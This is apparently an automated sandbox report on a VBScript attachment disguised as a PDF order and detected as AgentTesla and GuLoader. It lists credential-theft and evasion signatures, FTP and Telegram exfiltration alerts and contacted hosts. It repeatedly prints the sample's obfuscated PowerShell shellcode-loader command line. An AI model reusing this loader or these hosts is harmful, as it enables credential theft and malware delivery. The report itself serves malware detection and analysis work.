Edit tour

Windows Analysis Report
Ordine n.47201 pdf.vbs

Overview

General Information

Sample Name:	Ordine n.47201 pdf.vbs
Analysis ID:	755275
MD5:	c8290bc8659c4a6a45ccd1af9268e400
SHA1:	d2a97dd4fa44d5e2a568d75b764cc47e5878f960
SHA256:	f39968efba7ebe58abba685f5b834f6e0c8393dfaeaf7d08d5f6e625c33a04e1
Tags:	agentteslavbs
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected AgentTesla

Sigma detected: Dot net compiler compiles file from suspicious location

VBScript performs obfuscated calls to suspicious functions

Multi AV Scanner detection for domain / URL

Yara detected GuLoader

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Wscript starts Powershell (via cmd or directly)

Potential malicious VBS script found (suspicious strings)

Tries to harvest and steal ftp login credentials

Very long command line found

May check the online IP address of the machine

Potential evasive VBS script found (use of timer() function in loop)

Obfuscated command line found

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Java / VBScript file with very long strings (likely obfuscated code)

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Uses FTP

Found evasive API chain (may stop execution after accessing registry keys)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Compiles C# or VB.Net code

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5812 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

cmd.exe (PID: 5780 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

powershell.exe (PID: 5864 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKllHaaUptNa)Co;La[BaDHelNelUnIDimRapChoGrrGetTi(mi`"""cogRadPaiTe3Ba2Ho`"""Un)no]OppSwuWhbXelRuikucBi UnsMatFraJotSoiIscAs SoeWoxPitSyeKvrSenSt DiisanEptDa PaGAfeMbtFlCHylAfiSaptaRCagEnnKa(koiBenPatCa KaRSeuEklEnaYa,PsiSknWatMi BlLNiiKnkInvLa1Bl0Fo4Ru)Sy;Ra[AlDArlAblPrILimBepdeotirSetJa(pa`"""BauPasEdeSkrps3me2Gi`"""De)In]UdpInuBlbuolUniTmcUn FrsVitStaChtNoiBucAn AneTaxEttIneobrTanHj EtiArnSktSn KaGsueChtSnCOpllaiCaeSonNitBuRPaeClcUntUd(DeiCanAstEp UpdSaeGoslu,MiiUmnFotHe WiCMoeAcnGe)Fu;St[EnDFolNdlfrIramZopSkoPlrNitRe(Fu`"""SjkDyeTrrAnnOpePulAc3Un2su`"""Da)Am]RapopuTobFolDaiDrcAu AbsSptBiaCetFuiEncPa PseClxFetSeeMirSynTo GlISunCrtSpPdetPerUn PaESenFauDomAfSUnybasAdtbreUdmDiLStoFacReaGalTreSwsAmWKr(ScuKaiAdnLitUn StvKa1Al,DeiFrnsytTr OovGo2pl)re;ca}bl'Sa;An`$seSretLauKreMeoGarOpgbolKoeKorHusDr3Al=Sr[TrSRetDiuAneRooGrrSkgFolHeePorApsHa1Bl]In:Fl:MoVSniSarSetCaunoaSalAkATrlAvlKjoMucPe(Ne0no,Sc1Li0Bo4Co8Sp5ab7Th6Tr,Ko1Ud2Ka2Ag8Se8ba,Ch6Zo4Ja)Fo;Dr`$AfmKauGitJeaRitPaiMaoFanBniofsPetPa=Va(SeGPeemotAu-TiILhtSheFemOvPRerHjoStpFleFerHatUnyfe Pl-GuPOuaTjtAphMa Su'ErHUnKSuCMeUCh:Rn\SpNSueStcChrchoInlPeoTeggsiDecSnaAplWi\NaIDagAsnAdoForAreprrOviPenClgDieBerFasUm'Up)An.paSAckChiKlfSernyePrtSt;Pr`$EckUlrTaaUnkUnnRoiBonSggAweSurSmsAf Gl=Pi Rh[OkSAsyFoshytUneChmKo.ToCChoDanAnvMeebarHytVe]Ch:Th:BeFAfrCloMimDeBEnaUdsCieCo6Fo4OtSDitSerSuiAunSugMi(Fa`$EfmSouOvtUdaFitDeiReoMenRiiDosLotor)Re;Sp[FlSGuyUdstatFoeStmMe.WiRSkuDinUntAliMamTieUn.CiIUdnMetskeOvrKooSnpFiSDyeDirCrvMaiFrcFoeInsAl.SyMBeaTeransWrhkoaDelWi]Un:De:SkCAroStpSpyUn(Dr`$UlkCorToaOukFanHeiNonBlgCheSerFasLi,Mi Fl0He,Pa En Pu`$PoSPatDeuKaeBioPurVrgRulSkeOvrIwsIn3ie,To Sk`$MlkRerStaMekFrnRoiConAngSteOprOvsSa.SncCaodeuRanKrtPr)Un;Is[NeSMetebuBeePeoUnrSagOllUdeInrSasSo1Pr]Pe:Pa:SiEKanpiuUkmOpSTyySvsBrtcoeKrmHaLWeoAicLaaKrlWieMiswoWLn(Ba`$SpSDetSpuMaePaoNurUtgInlSaehyrEnsHj3Sc,Bi Kn0Me)Fo#Sk;""";Function Stueorglers4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $discontentment = $discontentment + $HS.Substring($i, 1); } $discontentment;}$Sudser0 = Stueorglers4 'riISyEScXFr ';$Sudser1= Stueorglers4 $Skoleeksempel;&$Sudser0 $Sudser1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 2108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)

cvtres.exe (PID: 1156 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)

CasPol.exe (PID: 4844 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 827875A7EE6003FC7F5301C613A2BB1C)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Ordine n.47201 pdf.vbs	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0xa36:$s1: .CreateObject("WScript.Shell") 0x3cde2:$p1: powershell.exe 0x49c55:$p1: powershell.exe

Memory Dumps

Source	Rule	Description	Author
00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000011.00000002.775853942.000000001D4E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi64_5812.amsi.csv	WScript_Shell_PowerShell_Combo	Detects malware from Middle Eastern campaign reported by Talos	Florian Roth	0x1a:$s1: .CreateObject("WScript.Shell") 0x72:$s1: .CreateObject("WScript.Shell") 0x1db:$p1: powershell.exe

Sigma Signatures

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCT

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.7 - Destination IP: 185.31.121.136

Timestamp:	192.168.2.7185.31.121.13649726613132851779 11/28/22-14:53:16.335427
SID:	2851779
Source Port:	49726
Destination Port:	61313
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil via FTP - Source IP: 192.168.2.7 - Destination IP: 185.31.121.136

Timestamp:	192.168.2.7185.31.121.13649725212029927 11/28/22-14:53:16.290035
SID:	2029927
Source Port:	49725
Destination Port:	21
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for domain / URL

Source: ftp.mcmprint.net

Virustotal: Detection: 9%

Perma Link

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.7:49723 version: TLS 1.2

Source:

Binary string: l;C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.pdb source: powershell.exe, 00000003.00000002.601070377.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.7:49725 -> 185.31.121.136:21
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49726 -> 185.31.121.136:61313

May check the online IP address of the machine

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	DNS query: name: api.ipify.org
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	DNS query: name: api.ipify.org

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Joe Sandbox View	IP Address: 52.20.78.240 52.20.78.240
Source: Joe Sandbox View	IP Address: 52.20.78.240 52.20.78.240

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Akkant/bwqPIdZhEA125.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache

Source: global traffic

TCP traffic: 192.168.2.7:49726 -> 185.31.121.136:61313

Source: unknown

FTP traffic detected: 185.31.121.136:21 -> 192.168.2.7:49725 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:53. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

DNS traffic detected: queries for: qwedft.gq

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Code function: 17_2_1D2AA09A recv,

17_2_1D2AA09A

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Akkant/bwqPIdZhEA125.psm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 52.20.78.240:443 -> 192.168.2.7:49723 version: TLS 1.2

System Summary

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe 